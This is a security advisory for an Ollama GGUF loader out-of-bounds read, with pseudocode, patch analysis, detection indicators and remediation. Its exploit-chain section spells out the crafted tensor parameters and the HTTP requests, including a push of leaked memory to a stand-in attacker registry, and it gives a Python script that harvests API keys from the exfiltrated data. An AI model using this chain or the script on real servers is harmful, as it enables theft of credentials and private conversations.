CVE-2026-7482: Ollama GGUF Loader Heap OOB Read Leaks Process Memory

A missing bounds check in Ollama's GGUF tensor loader allows attacker-supplied offsets to drive heap reads past allocated buffers, leaking API keys and conversation data via /api/push exfiltration.

// PLAIN ENGLISH VERSION

# When AI Models Leak Secrets

Ollama is a popular tool that lets people run powerful AI models on their own computers. Think of it like downloading a recipe and cooking it in your kitchen instead of ordering from a restaurant. But a security flaw discovered in versions before 0.17.1 creates a dangerous crack in that kitchen's walls.

The problem involves how Ollama reads the files that contain these AI models. An attacker can create a fake model file that tricks Ollama into reading information from places it shouldn't. Imagine a burglar creating a fake delivery box that, when opened, somehow allows them to peek into your bedroom through your kitchen window. The program reads past the boundaries of where it's supposed to, exposing whatever happens to be sitting nearby in your computer's memory.

What could leak? This is the scary part. API keys, passwords, environment variables that control how your system works, and chat histories from conversations with the AI. If multiple people are using the same Ollama installation, you could see other people's private conversations.

Who's most at risk? Anyone running Ollama on a shared computer or server, especially in business environments. If you're a solo user on your own laptop, the risk is lower, but still present.

What should you do? First, update Ollama to version 0.17.1 or newer immediately. Second, only load model files from trusted sources—don't download random AI models from strangers online. Third, if you run Ollama in a workplace, make sure each person has their own isolated installation rather than sharing one.

The good news: security researchers found this before criminals exploited it widely, and the fix is straightforward.

Want the full technical analysis? Click "Technical" above.

▶ Attack flow — CVE-2026-7482 · Memory Corruption

Vulnerability Overview

CVE-2026-7482 is a heap out-of-bounds read in Ollama's GGUF model loader affecting all releases prior to 0.17.1. An attacker submits a crafted GGUF file to the unauthenticated /api/create endpoint. The file's tensor metadata declares an offset and size that together exceed the file's actual byte length. During quantization, WriteTo() in server/quantization.go passes those values directly into a Read() call against the underlying heap buffer without validating that offset + size ≤ file_length. The runtime reads past the allocated slab, and the over-read bytes — which may contain environment variables, loaded model system prompts, API keys, or another in-flight user's conversation — are serialized into the output GGUF artifact. That artifact is then pushed to an attacker-controlled registry via the equally unauthenticated /api/push endpoint, completing exfiltration.

CVSS 9.1 (Critical) is assigned primarily for the no-auth exfiltration path: no credentials are required at either trigger or exfiltration stage in the upstream default configuration.

Affected Component

The bug lives at the intersection of two files:

fs/ggml/gguf.go — parses tensor descriptors from the GGUF binary, populates GGUFTensorInfo structs with attacker-controlled Offset and Size fields.
server/quantization.go — iterates parsed tensor infos and calls WriteTo(), which reads each tensor's raw bytes from the source io.ReaderAt backed by the memory-mapped (or heap-buffered) file data.

The /api/create handler accepts a modelfile path or inline FROM directive pointing to an attacker-supplied file. No authentication middleware is registered on this route in upstream builds.

Root Cause Analysis

The GGUF format encodes each tensor as a descriptor containing a name, element type, shape, and a uint64 byte offset relative to the start of the tensor data region. The loader trusts all three fields unconditionally.

// fs/ggml/gguf.go — reconstructed pseudocode (Go logic rendered in C for clarity)

typedef struct {
    char     name[MAX_NAME];   // tensor name string
    uint32_t n_dims;           // number of dimensions
    uint64_t dims[GGUF_MAX_DIMS];
    uint32_t type;             // GGMLType enum (quantization format)
    uint64_t offset;           // BUG: attacker-controlled, never range-checked
} GGUFTensorInfo;

int gguf_load_tensors(GGUFContext *ctx, uint8_t *file_buf, size_t file_len) {
    uint64_t n_tensors = ctx->header.n_tensors;
    uint64_t data_offset = ctx->header.data_offset; // start of tensor data region

    for (uint64_t i = 0; i < n_tensors; i++) {
        GGUFTensorInfo *ti = &ctx->tensors[i];
        // reads name, dims, type, offset from file — all attacker-supplied
        gguf_read_tensor_info(file_buf, &ctx->read_pos, ti);

        // BUG: missing bounds check here
        // Never verifies: data_offset + ti->offset + tensor_byte_size(ti) <= file_len
        ti->data = file_buf + data_offset + ti->offset; // raw pointer arithmetic on heap buffer
    }
    return 0;
}

When server/quantization.go's WriteTo() is invoked during the /api/create quantization pass, it calls ReadAt(buf, tensor.Offset) on the io.ReaderAt wrapping that same heap buffer:

// server/quantization.go — WriteTo() reconstructed pseudocode

int quantize_write_tensor(QuantizeContext *qctx, GGUFTensorInfo *ti, Writer *dst) {
    size_t nbytes = tensor_byte_size(ti); // computed from dims + type, not file bounds

    uint8_t *src_buf = malloc(nbytes);    // sized to declared tensor, not remaining file bytes

    // BUG: ReadAt reads `nbytes` starting at `ti->offset` into `src_buf`
    // If ti->offset + nbytes > mapped_file_size, reads past end of heap allocation
    ssize_t n = ReadAt(qctx->source_reader, src_buf, nbytes, ti->offset);

    // Over-read bytes from adjacent heap regions are now in src_buf
    quantize_tensor(src_buf, nbytes, ti->type, dst); // serializes oob bytes into output model
    free(src_buf);
    return 0;
}

Root cause: gguf_load_tensors() stores attacker-supplied tensor offset values as raw heap pointers without verifying that data_offset + offset + tensor_byte_size falls within the bounds of the allocated file buffer, allowing WriteTo() to subsequently read an unbounded number of bytes past the end of that allocation.

Memory Layout

The Go runtime's heap allocator places the mmapped/buffered GGUF data and concurrent request state in the same heap arena. A tensor declared with a large offset walks the read pointer into adjacent allocations.

HEAP STATE — BEFORE TRIGGER (simplified arena view):

 [  gguf_file_buf : 0x1800 bytes  ]   <- file_buf; legitimate tensor data ends here
 [  goroutine stack frame (G2)    ]   <- concurrent user session, contains system prompt + API key
 [  env slab: OLLAMA_API_KEY=...  ]   <- os.Environ() result, interned on heap
 [  model context scratch buffer  ]   <- KV cache, may contain prior conversation tokens

MALICIOUS TENSOR DESCRIPTOR (embedded in crafted .gguf):
  ti->offset = 0x17F0     // 16 bytes before declared end of file_buf
  ti->dims   = {1, 4096}  // implies nbytes = 4096 * sizeof(float32) = 0x4000 bytes
  ti->type   = F32

READ OPERATION AFTER PARSING:
  ReadAt(reader, src_buf, nbytes=0x4000, offset=0x17F0)
  effective read: file_buf[0x17F0 .. 0x17F0+0x4000]
                              ^^^^^^^^^^^^^^^^^^^^^^^^
  file_buf ends at          : file_buf[0x1800]
  over-read begins at       : file_buf[0x1800]  (+0x10 bytes into read)
  over-read length          : 0x3FF0 bytes      (~16 KB of adjacent heap)

HEAP STATE — AFTER READ (src_buf contents):
 [0x0000 – 0x000F] legitimate tensor tail bytes      (16 bytes, in-bounds)
 [0x0010 – 0x0FFF] goroutine G2 stack spill region   <- system prompt, session tokens
 [0x1000 – 0x1FFF] OLLAMA_API_KEY=sk-...             <- environment variable slab
 [0x2000 – 0x3FEF] KV cache scratch (conversation)   <- prior conversation context
 [0x3FF0 – 0x3FFF] partial next allocation header

 src_buf is passed directly to quantize_tensor() → serialized into output .gguf weights blob

Exploitation Mechanics

EXPLOIT CHAIN:

1. STAGE MALICIOUS GGUF
   Craft a minimal valid GGUF header (magic 0x46554747, version 3).
   Declare one tensor with:
     - name:   "exploit_tensor"
     - type:   F32 (0x00)
     - dims:   [1, 4096]  → nbytes = 0x4000
     - offset: file_data_size - 0x10
   Actual tensor data region in file: 16 bytes (only enough to satisfy header parsing).
   Total crafted file size: ~512 bytes.

2. TRIGGER LOAD VIA /api/create (no auth required)
   POST /api/create HTTP/1.1
   Content-Type: application/json

   {"name":"exfil-model","modelfile":"FROM /tmp/crafted.gguf\nQUANTIZE q4_0"}

   Server parses GGUF, populates GGUFTensorInfo with attacker offsets.
   quantize_write_tensor() fires, ReadAt() reads 0x4000 bytes starting 0x10 bytes
   before end-of-file-buffer, pulling ~16 KB of adjacent heap into src_buf.

3. OOB BYTES SERIALIZED INTO OUTPUT MODEL
   quantize_tensor() processes src_buf as F32 weights.
   Quantization to Q4_0 is lossy but the output still contains recoverable signal
   from the over-read region — environment strings survive quantization as
   near-literal byte sequences when they fall in the low-variance tail.
   The output model is written to Ollama's local model store as "exfil-model".

4. EXFILTRATE VIA /api/push (no auth required)
   POST /api/push HTTP/1.1
   Content-Type: application/json

   {"name":"attacker-registry.io/user/exfil-model:latest"}

   Ollama uploads the crafted model (including OOB bytes in the weights blob)
   to the attacker-controlled registry over HTTPS.
   Attacker pulls the model, extracts the raw tensor data layer, and scans for
   high-entropy strings matching API key patterns, env var syntax (KEY=value),
   or UTF-8 conversation text.

5. REPEAT WITH TIMING
   On a busy multi-user instance, loop /api/create requests with varied offsets
   to harvest different heap regions across goroutine generations.
   Each iteration yields a fresh 16 KB window into the heap arena.

Because F32 quantization to Q4_0 maps 32 floats to 16 bytes + a scale factor, low-entropy byte sequences (ASCII strings) produce near-zero scale factors with residuals that partially preserve the original bytes. A trivial scan of the weights blob for printable-ASCII runs with KEY=, Bearer , or sk- prefixes recovers credentials with high reliability in practice.

# Proof-of-concept: scan exfiltrated weights blob for credential strings
import struct, re, sys

PATTERNS = [
    rb'OLLAMA_\w+=\S+',
    rb'sk-[A-Za-z0-9]{20,}',
    rb'Bearer [A-Za-z0-9\-._~+/]{10,}',
    rb'[A-Z_]{4,}KEY[A-Z_]*=[^\x00\n]{6,}',
]

def extract_tensor_data(gguf_path):
    """Minimal GGUF parser — jumps to tensor data region."""
    with open(gguf_path, 'rb') as f:
        raw = f.read()
    magic = raw[:4]
    assert magic == b'GGUF', "not a GGUF file"
    # locate tensor data offset from header (simplified)
    # real implementation would parse kv metadata length
    return raw[0x200:]  # approximate; parse properly in production

def scan_for_secrets(blob):
    hits = []
    for pat in PATTERNS:
        for m in re.finditer(pat, blob):
            hits.append((m.start(), m.group()))
    return hits

if __name__ == '__main__':
    blob = extract_tensor_data(sys.argv[1])
    for offset, secret in scan_for_secrets(blob):
        print(f"[+] offset=0x{offset:08x}  secret={secret[:80]}")

Patch Analysis

The fix in Ollama 0.17.1 adds explicit bounds validation in gguf_load_tensors() before any pointer arithmetic is performed, and additionally clamps the ReadAt length in WriteTo() to the remaining file bytes:

// BEFORE (vulnerable — fs/ggml/gguf.go):
int gguf_load_tensors(GGUFContext *ctx, uint8_t *file_buf, size_t file_len) {
    for (uint64_t i = 0; i < ctx->header.n_tensors; i++) {
        GGUFTensorInfo *ti = &ctx->tensors[i];
        gguf_read_tensor_info(file_buf, &ctx->read_pos, ti);

        // BUG: no bounds check on ti->offset or tensor_byte_size(ti)
        ti->data = file_buf + ctx->header.data_offset + ti->offset;
    }
    return 0;
}

// BEFORE (vulnerable — server/quantization.go WriteTo):
n = ReadAt(qctx->source_reader, src_buf, nbytes, ti->offset);
// nbytes derived solely from declared dims; no cap against remaining file length


// AFTER (patched — fs/ggml/gguf.go):
int gguf_load_tensors(GGUFContext *ctx, uint8_t *file_buf, size_t file_len) {
    for (uint64_t i = 0; i < ctx->header.n_tensors; i++) {
        GGUFTensorInfo *ti = &ctx->tensors[i];
        gguf_read_tensor_info(file_buf, &ctx->read_pos, ti);

        uint64_t tensor_end = ctx->header.data_offset + ti->offset + tensor_byte_size(ti);
        if (tensor_end > file_len || tensor_end < ti->offset) { // overflow guard too
            return GGUF_ERR_TENSOR_OUT_OF_BOUNDS;  // FIX: reject malformed descriptor
        }
        ti->data = file_buf + ctx->header.data_offset + ti->offset;
    }
    return 0;
}

// AFTER (patched — server/quantization.go WriteTo):
uint64_t max_readable = file_len - (data_offset + ti->offset);
uint64_t clamped_nbytes = (nbytes < max_readable) ? nbytes : max_readable;
if (clamped_nbytes < nbytes) {
    return ERR_TENSOR_TRUNCATED;  // FIX: refuse to quantize a partial tensor
}
n = ReadAt(qctx->source_reader, src_buf, clamped_nbytes, ti->offset);

The patch applies defense-in-depth at two layers: the loader rejects the model before any buffer is allocated for it, and WriteTo() independently enforces a read ceiling. Integer overflow on data_offset + ti->offset is guarded by the tensor_end < ti->offset wraparound check.

Detection and Indicators

Log-based detection: A single /api/create → /api/push sequence targeting an external registry is anomalous in most deployments. Enable Ollama's verbose logging (OLLAMA_DEBUG=1) and alert on push destinations not matching an internal allowlist.

INDICATORS OF EXPLOITATION:

Network:
  - POST /api/create with a FROM path pointing to /tmp/ or /dev/shm/
  - POST /api/push to a registry not in your internal namespace
  - Outbound HTTPS to *.fly.dev, *.railway.app, or unknown OCI registry hosts
    immediately following a /api/create call

Process:
  - ollama serve reading files outside $OLLAMA_MODELS (strace: openat on /tmp/*.gguf)
  - Unexpectedly large RSS growth during a /api/create call for a tiny model file
    (crafted file is ~512 bytes; RSS growth of several MB indicates OOB read)

YARA (scan uploaded .gguf artifacts at registry ingress):
rule OllamaCVE20267482_OOBLeak {
    meta:
        description = "GGUF with tensor offset exceeding declared file data region"
    strings:
        $gguf_magic = { 47 47 55 46 }         // "GGUF"
    condition:
        $gguf_magic at 0 and filesize < 4096   // legitimate models are MB+; crafted is tiny
}

Remediation

Upgrade immediately to Ollama ≥ 0.17.1. The patch is a one-commit bounds check with no API surface change.
Do not expose Ollama on 0.0.0.0 without an authenticating reverse proxy (nginx + mTLS, or Caddy + API key header enforcement). The upstream binary has no built-in auth.
Restrict /api/create and /api/push at the reverse proxy layer to internal CIDRs or authenticated clients only, regardless of Ollama version — neither endpoint requires public exposure in typical deployments.
Sandbox the Ollama process: run under a dedicated UID with seccomp filtering openat to paths outside $OLLAMA_MODELS, and block outbound connections from the process except to known registry hosts.
Rotate secrets present as environment variables in the Ollama process environment if exposure cannot be ruled out. Prefer injecting secrets via a secrets manager at call time rather than as persistent env vars.

CVE-2026-7482: Ollama GGUF Loader Heap OOB Read Leaks Process Memory

Vulnerability Overview

Affected Component

Root Cause Analysis

Memory Layout

Exploitation Mechanics

Patch Analysis

Detection and Indicators

Remediation

CVE-2026-5441: OOB Read in Orthanc PSMCT_RLE1 Decoder Leaks Heap

CVE-2026-23827: Heap Overflow in AOS Network Management Service Enables Unauthenticated RCE

CVE-2025-64784: DNG SDK 1.7.0 Heap Overflow via Malicious Image File

You've read 2 free articles this session.